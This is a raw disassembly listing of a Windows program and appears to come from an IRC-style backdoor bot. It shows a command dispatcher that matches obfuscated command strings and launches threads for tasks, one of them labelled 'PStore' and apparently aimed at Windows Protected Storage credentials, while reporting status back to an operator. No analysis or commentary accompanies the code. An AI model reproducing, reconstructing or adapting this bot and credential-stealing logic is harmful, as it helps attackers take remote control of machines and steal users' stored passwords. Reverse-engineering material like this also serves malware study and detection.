push dword ptr [esi+0Ch]
jmp short loc_40B84E
; ---------------------------------------------------------------------------
loc_40B84C: ; CODE XREF: sub_40A9FE+E47�j
push dword ptr [esi]
loc_40B84E: ; CODE XREF: sub_40A9FE+E4C�j
push eax
call dword_4370B4 ; lstrcpyA
mov eax, [ebp+arg_10]
mov [ebp+var_BB0], eax
mov ebx, [ebx+4]
test ebx, ebx
jz short loc_40B87A
push offset aNfknl0nqigy0 ; "NFKNL0nQigY0"
push ebx
call edi ; dword_437178
neg eax
sbb eax, eax
inc eax
mov [ebp+var_B1C], eax
jmp short loc_40B881
; ---------------------------------------------------------------------------
loc_40B87A: ; CODE XREF: sub_40A9FE+E65�j
and [ebp+var_B1C], 0
loc_40B881: ; CODE XREF: sub_40A9FE+E7A�j
push offset aO_sxv_ze9bk1go ; "O.sxv.ze9bK1GOISY.dO.Vn1"
push offset aSThreadList ; "%s Thread list"
push 6
call sub_4234A7
add esp, 0Ch
mov [ebp+var_B2C], eax
lea eax, [ebp+arg_0]
xor edi, edi
push eax
lea eax, [ebp+var_BB0]
push edi
push eax
push offset sub_423719
push edi
push edi
call dword_437180 ; CreateThread
mov ecx, [ebp+var_B2C]
imul ecx, 2724h
cmp eax, edi
mov dword_46D72C[ecx], eax
jnz short loc_40B91E
cmp [ebp+arg_14], 0
mov ebx, dword_437170
mov edi, offset aSSD_ ; "%s %s (%d)."
jnz short loc_40B8FF
cmp [ebp+arg_18], 0
jnz short loc_40B909
call ebx ; dword_437170
push eax
push offset a4ezrg1ye5hp1au ; "4Ezrg1ye5hp1AUz6N/Zzkas/bbUvL0k.zqt1cpO"...
push offset aO_sxv_ze9bk1go ; "O.sxv.ze9bK1GOISY.dO.Vn1"
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 18h
loc_40B8FF: ; CODE XREF: sub_40A9FE+EDD�j
cmp [ebp+arg_18], 0
jz loc_414995
loc_40B909: ; CODE XREF: sub_40A9FE+EE3�j
call ebx ; dword_437170
push eax
push offset a4ezrg1ye5hp1au ; "4Ezrg1ye5hp1AUz6N/Zzkas/bbUvL0k.zqt1cpO"...
jmp loc_40B7CD
; ---------------------------------------------------------------------------
loc_40B916: ; CODE XREF: sub_40A9FE+F26�j
push 32h
call dword_437190 ; Sleep
loc_40B91E: ; CODE XREF: sub_40A9FE+ECC�j
cmp [ebp+var_AF4], edi
jz short loc_40B916
jmp loc_414995
; ---------------------------------------------------------------------------
loc_40B92B: ; CODE XREF: sub_40A9FE+C79�j
push dword ptr [ebx]
push offset aG3obv_r6j7h ; "g3obv.r6j7H/"
call edi ; dword_437178
test eax, eax
jnz loc_40BA72
push dword ptr [ebx+4]
push offset aDJstMfgyq_ ; "d/Jst/MFgyQ."
call edi ; dword_437178
test eax, eax
jnz loc_40BA72
push 12h
call sub_42381F
xor edi, edi
pop ecx
cmp eax, edi
mov [ebp+arg_C], eax
jle short loc_40B9A4
mov ebx, offset aLtlec18us5q0 ; "LTLec18US5q0"
loc_40B964: ; CODE XREF: sub_40A9FE+1604�j
; sub_40A9FE+1748�j ...
cmp [ebp+arg_14], 0
mov edi, offset aSSD_ ; "%s %s (%d)."
jnz short loc_40B98D
cmp [ebp+arg_18], 0
jnz short loc_40B997
push [ebp+arg_C]
push offset aJqrlpUxr08Qqdu ; "JQrlp/UXr08/qqduw/ZeDHN/N/Wda.tYScO0znN"...
push ebx
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 18h
loc_40B98D: ; CODE XREF: sub_40A9FE+F6F�j
cmp [ebp+arg_18], 0
jz loc_414995
loc_40B997: ; CODE XREF: sub_40A9FE+F75�j
push [ebp+arg_C]
push offset aJqrlpUxr08Qqdu ; "JQrlp/UXr08/qqduw/ZeDHN/N/Wda.tYScO0znN"...
jmp loc_41491B
; ---------------------------------------------------------------------------
loc_40B9A4: ; CODE XREF: sub_40A9FE+F5F�j
cmp [ebp+arg_2C], edi
jz short loc_40B9B0
mov ebx, [ebx+8]
cmp ebx, edi
jnz short loc_40B9B7
loc_40B9B0: ; CODE XREF: sub_40A9FE+FA9�j
push offset dword_443F24
jmp short loc_40B9B8
; ---------------------------------------------------------------------------
loc_40B9B7: ; CODE XREF: sub_40A9FE+FB0�j
push ebx
loc_40B9B8: ; CODE XREF: sub_40A9FE+FB7�j
lea eax, [ebp+var_1AEC]
push eax
call dword_4370B4 ; lstrcpyA
mov eax, [ebp+arg_10]
mov ebx, offset aLtlec18us5q0 ; "LTLec18US5q0"
push offset aIhfnL6b5x ; "/iHFN/l6B5X/"
push ebx
push offset aSS_ ; "%s %s."
push 12h
mov [ebp+var_1AF0], eax
call sub_4234A7
add esp, 10h
mov [ebp+var_1A6C], eax
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_1AF0]
push edi
push eax
push offset sub_425AE4
push edi
push edi
call dword_437180 ; CreateThread
mov ecx, [ebp+var_1A6C]
imul ecx, 2724h
cmp eax, edi
mov dword_46D72C[ecx], eax
jz loc_412FED
jmp short loc_40BA2B
; ---------------------------------------------------------------------------
loc_40BA23: ; CODE XREF: sub_40A9FE+1033�j
push 32h
call dword_437190 ; Sleep
loc_40BA2B: ; CODE XREF: sub_40A9FE+1023�j
cmp [ebp+var_1A34], edi
jz short loc_40BA23
cmp [ebp+arg_14], 0
mov edi, offset aSStarted_ ; "%s started."
jnz short loc_40BA54
cmp [ebp+arg_18], 0
jnz short loc_40BA5E
push ebx
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 10h
loc_40BA54: ; CODE XREF: sub_40A9FE+103E�j
cmp [ebp+arg_18], 0
jz loc_412FED
loc_40BA5E: ; CODE XREF: sub_40A9FE+1044�j
push ebx
loc_40BA5F: ; CODE XREF: sub_40A9FE+85C6�j
push edi
loc_40BA60: ; CODE XREF: sub_40A9FE+5CCB�j
; sub_40A9FE+8367�j
push dword ptr [esi]
push [ebp+arg_10]
call sub_41CDD4
loc_40BA6A: ; CODE XREF: sub_40A9FE+5292�j
add esp, 10h
jmp loc_412FED
; ---------------------------------------------------------------------------
loc_40BA72: ; CODE XREF: sub_40A9FE+F38�j
; sub_40A9FE+F4A�j
push dword ptr [ebx]
push offset aG3obv_r6j7h ; "g3obv.r6j7H/"
call edi ; dword_437178
test eax, eax
jnz short loc_40BAA9
push dword ptr [ebx+4]
push offset aErwc30qfw_p0 ; "eRWc30Qfw.P0"
call edi ; dword_437178
test eax, eax
jnz short loc_40BAA9
push offset aLtlec18us5q0 ; "LTLec18US5q0"
push 12h
jmp loc_412B29
; ---------------------------------------------------------------------------
loc_40BA99: ; CODE XREF: sub_40A9FE+8134�j
push [ebp+arg_18]
push [ebp+arg_14]
push [ebp+arg_10]
push dword ptr [esi]
jmp loc_412CB2
; ---------------------------------------------------------------------------
loc_40BAA9: ; CODE XREF: sub_40A9FE+107F�j
; sub_40A9FE+108D�j
push dword ptr [ebx]
push offset aM5spx_qp7lx_ ; "M5sPX.Qp7Lx."
call edi ; dword_437178
test eax, eax
jnz loc_40BE03
push 13h
call sub_42381F
test eax, eax
pop ecx
mov [ebp+arg_C], eax
jle short loc_40BB0D
cmp [ebp+arg_14], 0
mov ebx, offset aJqrlpUxr08Qqdu ; "JQrlp/UXr08/qqduw/ZeDHN/N/Wda.tYScO0znN"...
mov edi, offset aSSD_ ; "%s %s (%d)."
jnz short loc_40BAF5
cmp [ebp+arg_18], 0
jnz short loc_40BAFF
push eax
push ebx
push offset a6atss0dycwf_6n ; "6atSs0dyCWF.6N5aw.affEY1"
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 18h
loc_40BAF5: ; CODE XREF: sub_40A9FE+10D9�j
cmp [ebp+arg_18], 0
jz loc_414995
loc_40BAFF: ; CODE XREF: sub_40A9FE+10DF�j
push [ebp+arg_C]
push ebx
loc_40BB03: ; CODE XREF: sub_40A9FE+13EB�j
push offset a6atss0dycwf_6n ; "6atSs0dyCWF.6N5aw.affEY1"
jmp loc_41491C
; ---------------------------------------------------------------------------
loc_40BB0D: ; CODE XREF: sub_40A9FE+10C9�j
cmp [ebp+arg_2C], 0
mov ecx, offset dword_443F2C
jz short loc_40BB1F
mov eax, [ebx+8]
test eax, eax
jnz short loc_40BB22
loc_40BB1F: ; CODE XREF: sub_40A9FE+1118�j
push ecx
jmp short loc_40BB23
; ---------------------------------------------------------------------------
loc_40BB22: ; CODE XREF: sub_40A9FE+111F�j
push eax
loc_40BB23: ; CODE XREF: sub_40A9FE+1122�j
lea eax, [ebp+var_59C]
push eax
call dword_4370B4 ; lstrcpyA
mov eax, [ebp+arg_10]
and [ebp+var_4E4], 0
mov [ebp+var_5A0], eax
mov eax, [ebp+arg_14]
mov [ebp+var_4EC], eax
mov eax, [ebp+arg_18]
mov [ebp+var_4E8], eax
mov eax, [ebp+arg_20]
mov [ebp+var_4F0], eax
push dword ptr [ebx+4]
push offset aItx_n_wpamx_ ; "ITx.N.WPAmx."
call edi ; dword_437178
test eax, eax
jnz loc_40BC11
push offset a6atss0dycwf_6n ; "6atSs0dyCWF.6N5aw.affEY1"
push offset aSPstore ; "%s PStore"
push 13h
call sub_4234A7
add esp, 0Ch
mov [ebp+var_51C], eax
lea eax, [ebp+arg_0]
xor edi, edi
push eax
lea eax, [ebp+var_5A0]
push edi
push eax
push offset sub_42521F
push edi
push edi
call dword_437180 ; CreateThread
mov ecx, [ebp+var_51C]
imul ecx, 2724h
cmp eax, edi
mov dword_46D72C[ecx], eax
jnz short loc_40BC04
cmp [ebp+arg_14], 0
mov ebx, dword_437170
mov edi, offset aSSD_ ; "%s %s (%d)."
jnz short loc_40BBEB
cmp [ebp+arg_18], 0
jnz short loc_40BBF5
call ebx ; dword_437170
push eax
push offset a4ezrg1ye5hp1au ; "4Ezrg1ye5hp1AUz6N/Zzkas/bbUvL0k.zqt1cpO"...
push offset a6atss0dycwf_6n ; "6atSs0dyCWF.6N5aw.affEY1"
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 18h
loc_40BBEB: ; CODE XREF: sub_40A9FE+11C9�j
cmp [ebp+arg_18], 0
jz loc_414995
loc_40BBF5: ; CODE XREF: sub_40A9FE+11CF�j
call ebx ; dword_437170
jmp loc_40BDE3
; ---------------------------------------------------------------------------
loc_40BBFC: ; CODE XREF: sub_40A9FE+120C�j
push 32h
call dword_437190 ; Sleep
loc_40BC04: ; CODE XREF: sub_40A9FE+11B8�j
cmp [ebp+var_4E4], edi
jz short loc_40BBFC
jmp loc_414995
; ---------------------------------------------------------------------------
loc_40BC11: ; CODE XREF: sub_40A9FE+1169�j
mov eax, [ebx+4]
test eax, eax
jz short loc_40BC34
push offset dword_43D664
push eax
call sub_42AEA0
pop ecx
test eax, eax
pop ecx
jz short loc_40BC34
mov eax, [ebx+4]
mov [ebp+var_518], eax
jmp short loc_40BC3B
; ---------------------------------------------------------------------------
loc_40BC34: ; CODE XREF: sub_40A9FE+1218�j
; sub_40A9FE+1229�j
and [ebp+var_518], 0
loc_40BC3B: ; CODE XREF: sub_40A9FE+1234�j
push offset a6atss0dycwf_6n ; "6atSs0dyCWF.6N5aw.affEY1"
push offset aSPstore ; "%s PStore"
push 13h
call sub_4234A7
add esp, 0Ch
mov [ebp+var_51C], eax
lea eax, [ebp+arg_0]
lea ecx, [ebp+var_5A0]
push eax
xor eax, eax
push eax
push ecx
push offset sub_423846
push eax
push eax
call dword_437180 ; CreateThread
mov ecx, [ebp+var_51C]
mov edi, offset aSSD_ ; "%s %s (%d)."
imul ecx, 2724h
test eax, eax
mov dword_46D72C[ecx], eax
jnz short loc_40BD01
cmp [ebp+arg_14], eax
jnz short loc_40BCB5
cmp [ebp+arg_18], eax
jnz short loc_40BCBB
call dword_437170 ; RtlGetLastWin32Error
push eax
push offset a4ezrg1ye5hp1au ; "4Ezrg1ye5hp1AUz6N/Zzkas/bbUvL0k.zqt1cpO"...
push offset a6atss0dycwf_6n ; "6atSs0dyCWF.6N5aw.affEY1"
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 18h
loc_40BCB5: ; CODE XREF: sub_40A9FE+1290�j
cmp [ebp+arg_18], 0
jz short loc_40BCDA
loc_40BCBB: ; CODE XREF: sub_40A9FE+1295�j
call dword_437170 ; RtlGetLastWin32Error
push eax
push offset a4ezrg1ye5hp1au ; "4Ezrg1ye5hp1AUz6N/Zzkas/bbUvL0k.zqt1cpO"...
push offset a6atss0dycwf_6n ; "6atSs0dyCWF.6N5aw.affEY1"
push edi
push dword ptr [esi]
push [ebp+arg_10]
call sub_41CDD4
add esp, 18h
loc_40BCDA: ; CODE XREF: sub_40A9FE+12BB�j
; sub_40A9FE+130C�j
push 0BB8h
call dword_437190 ; Sleep
cmp [ebp+arg_2C], 0
jz short loc_40BCF2
mov eax, [ebx+8]
test eax, eax
jnz short loc_40BD0C
loc_40BCF2: ; CODE XREF: sub_40A9FE+12EB�j
push offset dword_443F2C
jmp short loc_40BD0D
; ---------------------------------------------------------------------------
loc_40BCF9: ; CODE XREF: sub_40A9FE+130A�j
push 32h
call dword_437190 ; Sleep
loc_40BD01: ; CODE XREF: sub_40A9FE+128B�j
cmp [ebp+var_4E4], 0
jz short loc_40BCF9
jmp short loc_40BCDA
; ---------------------------------------------------------------------------
loc_40BD0C: ; CODE XREF: sub_40A9FE+12F2�j
push eax
loc_40BD0D: ; CODE XREF: sub_40A9FE+12F9�j
lea eax, [ebp+var_828]
push eax
call dword_4370B4 ; lstrcpyA
mov eax, [ebp+arg_10]
and [ebp+var_770], 0
mov [ebp+var_82C], eax
mov eax, [ebp+arg_14]
mov [ebp+var_778], eax
mov eax, [ebp+arg_18]
mov [ebp+var_774], eax
mov eax, [ebp+arg_20]
mov [ebp+var_77C], eax
mov eax, [ebx+4]
test eax, eax
jz short loc_40BD72
push offset dword_43D664
push eax
call sub_42AEA0
pop ecx
test eax, eax
pop ecx
jz short loc_40BD68
mov eax, [ebx+4]
mov [ebp+var_7A4], eax
jmp short loc_40BD79
; ---------------------------------------------------------------------------
loc_40BD68: ; CODE XREF: sub_40A9FE+135D�j
xor ebx, ebx
mov [ebp+var_7A4], ebx
jmp short loc_40BD7B
; ---------------------------------------------------------------------------
loc_40BD72: ; CODE XREF: sub_40A9FE+134C�j
and [ebp+var_7A4], 0
loc_40BD79: ; CODE XREF: sub_40A9FE+1368�j
xor ebx, ebx
loc_40BD7B: ; CODE XREF: sub_40A9FE+1372�j
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_82C]
push ebx
push eax
push offset sub_425092
push ebx
push ebx
call dword_437180 ; CreateThread
mov ecx, [ebp+var_7A8]
imul ecx, 2724h
cmp eax, ebx
mov dword_46D72C[ecx], eax
jnz short loc_40BDF6
cmp [ebp+arg_14], ebx
jnz short loc_40BDD4
cmp [ebp+arg_18], ebx
jnz short loc_40BDDD
call dword_437170 ; RtlGetLastWin32Error
push eax
push offset a4ezrg1ye5hp1au ; "4Ezrg1ye5hp1AUz6N/Zzkas/bbUvL0k.zqt1cpO"...
push offset a6atss0dycwf_6n ; "6atSs0dyCWF.6N5aw.affEY1"
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 18h
loc_40BDD4: ; CODE XREF: sub_40A9FE+13AF�j
cmp [ebp+arg_18], ebx
jz loc_414995
loc_40BDDD: ; CODE XREF: sub_40A9FE+13B4�j
call dword_437170 ; RtlGetLastWin32Error
loc_40BDE3: ; CODE XREF: sub_40A9FE+11F9�j
push eax
push offset a4ezrg1ye5hp1au ; "4Ezrg1ye5hp1AUz6N/Zzkas/bbUvL0k.zqt1cpO"...
jmp loc_40BB03
; ---------------------------------------------------------------------------
loc_40BDEE: ; CODE XREF: sub_40A9FE+13FE�j
push 32h
call dword_437190 ; Sleep
loc_40BDF6: ; CODE XREF: sub_40A9FE+13AA�j
cmp [ebp+var_770], ebx
jz short loc_40BDEE
jmp loc_414995
; ---------------------------------------------------------------------------
loc_40BE03: ; CODE XREF: sub_40A9FE+10B6�j
push dword ptr [ebx]
push offset aLndk50vzcqw0 ; "LNdk50vzCqW0"
call edi ; dword_437178
test eax, eax
jnz loc_40BFDD
mov eax, [ebp+arg_10]
xor edi, edi
cmp [ebp+arg_2C], edi
mov [ebp+var_A28], eax
mov eax, [ebp+arg_18]
mov [ebp+var_970], eax
lea eax, [ebp+var_A24]
jnz loc_40BF43
push offset dword_443F2C
push eax
call dword_4370B4 ; lstrcpyA
cmp [ebp+arg_30], edi
jz short loc_40BE65
loc_40BE48: ; CODE XREF: sub_40A9FE+1552�j
push [ebp+var_970]
lea eax, [ebp+var_A24]
push [ebp+var_A28]
push eax
call sub_425568
jmp loc_40D35F
; ---------------------------------------------------------------------------
loc_40BE65: ; CODE XREF: sub_40A9FE+1448�j
mov eax, [ebx+4]
cmp eax, edi
jz loc_40BF0B
cmp [ebx+8], edi
jz loc_40BF0B
cmp [ebx+0Ch], edi
jz loc_40BF0B
push eax
call sub_420E5B
push dword ptr [ebx+0Ch]
mov [ebp+arg_C], eax
lea eax, [ebp+var_5EC8]
push offset aS_5 ; "%s"
push eax
call sub_429B03
add esp, 10h
push 4
pop esi
cmp [ebp+arg_4], esi
jle short loc_40BEE4
loc_40BEAA: ; CODE XREF: sub_40A9FE+14E4�j
mov eax, [ebx+esi*4]
cmp eax, edi
jz short loc_40BEDE
push eax
lea eax, [ebp+var_3F580]
push offset aS_1 ; " %s"
push eax
call sub_429B03
lea eax, [ebp+var_3F580]
push 104h
push eax
lea eax, [ebp+var_5EC8]
push eax
call sub_4299E0
add esp, 18h
loc_40BEDE: ; CODE XREF: sub_40A9FE+14B1�j
inc esi
cmp esi, [ebp+arg_4]
jl short loc_40BEAA
loc_40BEE4: ; CODE XREF: sub_40A9FE+14AA�j
push dword ptr [ebx+8]
lea eax, [ebp+var_5EC8]
push eax
push [ebp+arg_C]
loc_40BEF1: ; CODE XREF: sub_40A9FE+15DA�j
push [ebp+var_970]
lea eax, [ebp+var_A24]
push [ebp+arg_10]
push eax
call sub_4256F7
jmp loc_414927
; ---------------------------------------------------------------------------
loc_40BF0B: ; CODE XREF: sub_40A9FE+146C�j
; sub_40A9FE+1475�j ...
mov edi, offset aUhdhc1pcv9i ; "uhdhC1pCV9i/"
loc_40BF10: ; CODE XREF: sub_40A9FE+239B�j
; sub_40A9FE+5786�j ...
cmp [ebp+arg_14], 0
mov ebx, offset aFoabg1acvfoOsd ; "fOaBg1ACVfo/osdpb1E0v95."
jnz short loc_40BF3A
cmp [ebp+arg_18], 0
loc_40BF1F: ; CODE XREF: sub_40A9FE+57B9�j
; sub_40A9FE+816C�j
jnz loc_41478A
push ebx
push edi
push offset aSS_1 ; "%s %s"
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 14h
loc_40BF3A: ; CODE XREF: sub_40A9FE+151B�j
; sub_40A9FE+57B0�j ...
cmp [ebp+arg_18], 0
jmp loc_414784
; ---------------------------------------------------------------------------
loc_40BF43: ; CODE XREF: sub_40A9FE+1433�j
push dword ptr [ebx+4]
push eax
call dword_4370B4 ; lstrcpyA
cmp [ebp+arg_30], edi
jnz loc_40BE48
cmp [ebx+4], edi
jz short loc_40BF0B
mov eax, [ebx+8]
cmp eax, edi
jz short loc_40BF0B
cmp [ebx+0Ch], edi
jz short loc_40BF0B
cmp [ebx+10h], edi
jz short loc_40BF0B
push eax
call sub_420E5B
push dword ptr [ebx+10h]
mov edi, eax
lea eax, [ebp+var_60CC]
push offset aS_5 ; "%s"
push eax
call sub_429B03
add esp, 10h
push 5
pop esi
cmp [ebp+arg_4], esi
jle short loc_40BFCD
loc_40BF93: ; CODE XREF: sub_40A9FE+15CD�j
mov eax, [ebx+esi*4]
test eax, eax
jz short loc_40BFC7
push eax
lea eax, [ebp+var_13660]
push offset aS_1 ; " %s"
push eax
call sub_429B03
lea eax, [ebp+var_13660]
push 104h
push eax
lea eax, [ebp+var_60CC]
push eax
call sub_4299E0
add esp, 18h
loc_40BFC7: ; CODE XREF: sub_40A9FE+159A�j
inc esi
cmp esi, [ebp+arg_4]
jl short loc_40BF93
loc_40BFCD: ; CODE XREF: sub_40A9FE+1593�j
push dword ptr [ebx+0Ch]
lea eax, [ebp+var_60CC]
push eax
push edi
jmp loc_40BEF1
; ---------------------------------------------------------------------------
loc_40BFDD: ; CODE XREF: sub_40A9FE+1410�j
push dword ptr [ebx]
push offset a9ljbh07crkd_ ; "9lJBH07crkD."
call edi ; dword_437178
test eax, eax
jnz loc_40C121
push 14h
call sub_42381F
test eax, eax
pop ecx
mov [ebp+arg_C], eax
jle short loc_40C007
mov ebx, offset a7_pak0onymn7ra ; "7.PaK0OnymN/7Razv/1FefF."
jmp loc_40B964
; ---------------------------------------------------------------------------
loc_40C007: ; CODE XREF: sub_40A9FE+15FD�j
mov eax, [ebp+arg_14]
mov [ebp+var_BBC], eax
mov eax, [ebp+arg_18]
mov [ebp+var_BC0], eax
mov eax, [ebp+arg_20]
mov [ebp+var_BB8], eax
push dword ptr [esi+0Ch]
lea eax, [ebp+var_C44]
push eax
call dword_4370B4 ; lstrcpyA
mov eax, [ebp+arg_10]
mov edi, offset aIhfnL6b5x ; "/iHFN/l6B5X/"
push edi
mov ebx, offset aSS_ ; "%s %s."
push offset a7_pak0onymn7ra ; "7.PaK0OnymN/7Razv/1FefF."
push ebx
push 14h
mov [ebp+var_C48], eax
call sub_4234A7
add esp, 10h
mov [ebp+var_BC4], eax
lea eax, [ebp+arg_0]
lea ecx, [ebp+var_C48]
push eax
xor eax, eax
push eax
push ecx
push offset sub_425FFA
push eax
push eax
call dword_437180 ; CreateThread
mov ecx, [ebp+var_BC4]
imul ecx, 2724h
test eax, eax
mov dword_46D72C[ecx], eax
jnz short loc_40C0E2
cmp [ebp+arg_14], eax
mov ebx, dword_437170
mov edi, offset aSSD_ ; "%s %s (%d)."
jnz short loc_40C0BE
cmp [ebp+arg_18], eax
jnz short loc_40C0C8
call ebx ; dword_437170
push eax
push offset a4ezrg1ye5hp1au ; "4Ezrg1ye5hp1AUz6N/Zzkas/bbUvL0k.zqt1cpO"...
push offset a7_pak0onymn7ra ; "7.PaK0OnymN/7Razv/1FefF."
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 18h
loc_40C0BE: ; CODE XREF: sub_40A9FE+169D�j
cmp [ebp+arg_18], 0
jz loc_414995
loc_40C0C8: ; CODE XREF: sub_40A9FE+16A2�j
call ebx ; dword_437170
push eax
push offset a4ezrg1ye5hp1au ; "4Ezrg1ye5hp1AUz6N/Zzkas/bbUvL0k.zqt1cpO"...
push offset a7_pak0onymn7ra ; "7.PaK0OnymN/7Razv/1FefF."
jmp loc_41491C
; ---------------------------------------------------------------------------
loc_40C0DA: ; CODE XREF: sub_40A9FE+16EB�j
push 32h
call dword_437190 ; Sleep
loc_40C0E2: ; CODE XREF: sub_40A9FE+168D�j
cmp [ebp+var_BB4], 0
jz short loc_40C0DA
cmp [ebp+arg_14], 0
jnz short loc_40C10C
cmp [ebp+arg_18], 0
jnz short loc_40C116
push edi
push offset a7_pak0onymn7ra ; "7.PaK0OnymN/7Razv/1FefF."
push ebx
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 14h
loc_40C10C: ; CODE XREF: sub_40A9FE+16F1�j
cmp [ebp+arg_18], 0
jz loc_414995
loc_40C116: ; CODE XREF: sub_40A9FE+16F7�j
push edi
push offset a7_pak0onymn7ra ; "7.PaK0OnymN/7Razv/1FefF."
jmp loc_40B0FB
; ---------------------------------------------------------------------------
loc_40C121: ; CODE XREF: sub_40A9FE+15EA�j
push dword ptr [ebx]
push offset aRiocl1kztwo0 ; "rioCl1kzTWO0"
call edi ; dword_437178
test eax, eax
jnz loc_40C287
push 15h
call sub_42381F
test eax, eax
pop ecx
mov [ebp+arg_C], eax
jle short loc_40C14B
mov ebx, offset aWulzr_x7xjb0 ; "WUlZR.X7XjB0"
jmp loc_40B964
; ---------------------------------------------------------------------------
loc_40C14B: ; CODE XREF: sub_40A9FE+1741�j
mov eax, [ebp+arg_14]
mov [ebp+var_A38], eax
mov eax, [ebp+arg_20]
mov [ebp+var_A3C], eax
push dword ptr [esi+0Ch]
lea eax, [ebp+var_AE8]
push eax
call dword_4370B4 ; lstrcpyA
mov eax, [ebp+arg_10]
mov [ebp+var_AEC], eax
mov ebx, [ebx+4]
test ebx, ebx
jz short loc_40C186
push ebx
call sub_42A100
pop ecx
jmp short loc_40C18D
; ---------------------------------------------------------------------------
loc_40C186: ; CODE XREF: sub_40A9FE+177D�j
movzx eax, word_44399C
loc_40C18D: ; CODE XREF: sub_40A9FE+1786�j
push eax
mov edi, offset aIhfnL6b5x ; "/iHFN/l6B5X/"
push offset dword_457C40
mov ebx, offset aWulzr_x7xjb0 ; "WUlZR.X7XjB0"
push edi
push ebx
push offset aSSOnSI ; "%s %s on: [%s:%i]"
push 15h
mov [ebp+var_A4C], eax
call sub_4234A7
add esp, 18h
mov [ebp+var_A68], eax
lea eax, [ebp+arg_0]
lea ecx, [ebp+var_AEC]
push eax
xor eax, eax
push eax
push ecx
push offset sub_4217A4
push eax
push eax
call dword_437180 ; CreateThread
mov ecx, [ebp+var_A68]
imul ecx, 2724h
test eax, eax
mov dword_46D72C[ecx], eax
jnz short loc_40C231
cmp [ebp+arg_14], eax
mov edi, offset aSSD_ ; "%s %s (%d)."
jnz short loc_40C21A
cmp [ebp+arg_18], eax
jnz loc_41490F
call dword_437170 ; RtlGetLastWin32Error
push eax
push offset a4ezrg1ye5hp1au ; "4Ezrg1ye5hp1AUz6N/Zzkas/bbUvL0k.zqt1cpO"...
push ebx
push edi
push dword ptr [esi+0Ch]
loc_40C20F: ; CODE XREF: sub_40A9FE+1E28�j
push [ebp+arg_10]
call sub_41CE4A
add esp, 18h
loc_40C21A: ; CODE XREF: sub_40A9FE+17F5�j
; sub_40A9FE+1E07�j
cmp [ebp+arg_18], 0
jz loc_414995
jmp loc_41490F
; ---------------------------------------------------------------------------
loc_40C229: ; CODE XREF: sub_40A9FE+183A�j
push 32h
call dword_437190 ; Sleep
loc_40C231: ; CODE XREF: sub_40A9FE+17EB�j
cmp [ebp+var_A30], 0
jz short loc_40C229
cmp [ebp+arg_14], 0
jnz short loc_40C266
cmp [ebp+arg_18], 0
jnz short loc_40C270
push [ebp+var_A4C]
push offset dword_457C40
push edi
push ebx
push offset aSSOnSI_0 ; "%s %s on: (%s:%i)"
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 1Ch
loc_40C266: ; CODE XREF: sub_40A9FE+1840�j
cmp [ebp+arg_18], 0
jz loc_414995
loc_40C270: ; CODE XREF: sub_40A9FE+1846�j
push [ebp+var_A4C]
push offset dword_457C40
push edi
push ebx
push offset aSSOnSI_0 ; "%s %s on: (%s:%i)"
jmp loc_414988
; ---------------------------------------------------------------------------
loc_40C287: ; CODE XREF: sub_40A9FE+172E�j
push dword ptr [ebx]
push offset a_swwg1hqeii1 ; ".SWwg1hqeiI1"
call edi ; dword_437178
test eax, eax
jnz short loc_40C2A0
push offset aWulzr_x7xjb0 ; "WUlZR.X7XjB0"
push 15h
jmp loc_412B29
; ---------------------------------------------------------------------------
loc_40C2A0: ; CODE XREF: sub_40A9FE+1894�j
push dword ptr [ebx]
push offset aS3dyJzo6r_0 ; "s3dY//JZo6r/"
call edi ; dword_437178
test eax, eax
jz loc_41492C
push dword ptr [ebx]
push offset aDo5oa0u5m7_ ; "dO5oA/0U5m7."
call edi ; dword_437178
test eax, eax
jz loc_41492C
push dword ptr [ebx]
push offset aKe3l20ufrlq0 ; "kE3L20Ufrlq0"
call edi ; dword_437178
test eax, eax
jnz loc_40C4A1
lea eax, [ebp+var_30]
push eax
call dword_4370D0 ; QueryPerformanceCounter
lea eax, [ebp+var_38]
push eax
call dword_43718C ; QueryPerformanceFrequency
xor eax, eax
cmp [ebp+var_2C], eax
jl short loc_40C32E
jg short loc_40C2F5
cmp [ebp+var_30], eax
jbe short loc_40C32E
loc_40C2F5: ; CODE XREF: sub_40A9FE+18F0�j
cmp [ebp+var_34], eax
jl short loc_40C32E
jg short loc_40C301
cmp [ebp+var_38], eax
jbe short loc_40C32E
loc_40C301: ; CODE XREF: sub_40A9FE+18FC�j
push [ebp+var_34]
push [ebp+var_38]
push [ebp+var_2C]
push [ebp+var_30]
call sub_42B2F0
mov dword ptr [ebp+var_C], eax
mov dword ptr [ebp+var_C+4], edx
fild [ebp+var_C]
push ecx
push ecx ; double
fstp [esp+14h+var_14]
call sub_42A706
pop ecx
pop ecx
call sub_42A9E0
jmp short loc_40C334
; ---------------------------------------------------------------------------
loc_40C32E: ; CODE XREF: sub_40A9FE+18EE�j
; sub_40A9FE+18F5�j ...
call dword_437188 ; GetTickCount
loc_40C334: ; CODE XREF: sub_40A9FE+192E�j
xor ebx, ebx
mov edi, eax
inc ebx
push ebx
push 0
push edi
call sub_41B9F8
push eax
lea eax, [ebp+var_D90]
push eax
call sub_429B03
push ebx
push dword_457E58
push edi
call sub_41B9F8
push eax
lea eax, [ebp+var_D28]
push eax
call sub_429B03
push ebx
push dword_457F60
push edi
call sub_41B9F8
push eax
lea eax, [ebp+var_D5C]
push eax
call sub_429B03
mov edi, 2710h
lea eax, [ebp+var_6B4A0]
push edi
push 0
push eax
call sub_429760
add esp, 48h
push 8
call sub_423800
test eax, eax
pop ecx
jle short loc_40C3B9
push 0Dh
call sub_423800
cmp eax, ebx
pop ecx
jge short loc_40C3B9
push offset aTarxm0mtxpp_ ; "tArXm0mtxpp."
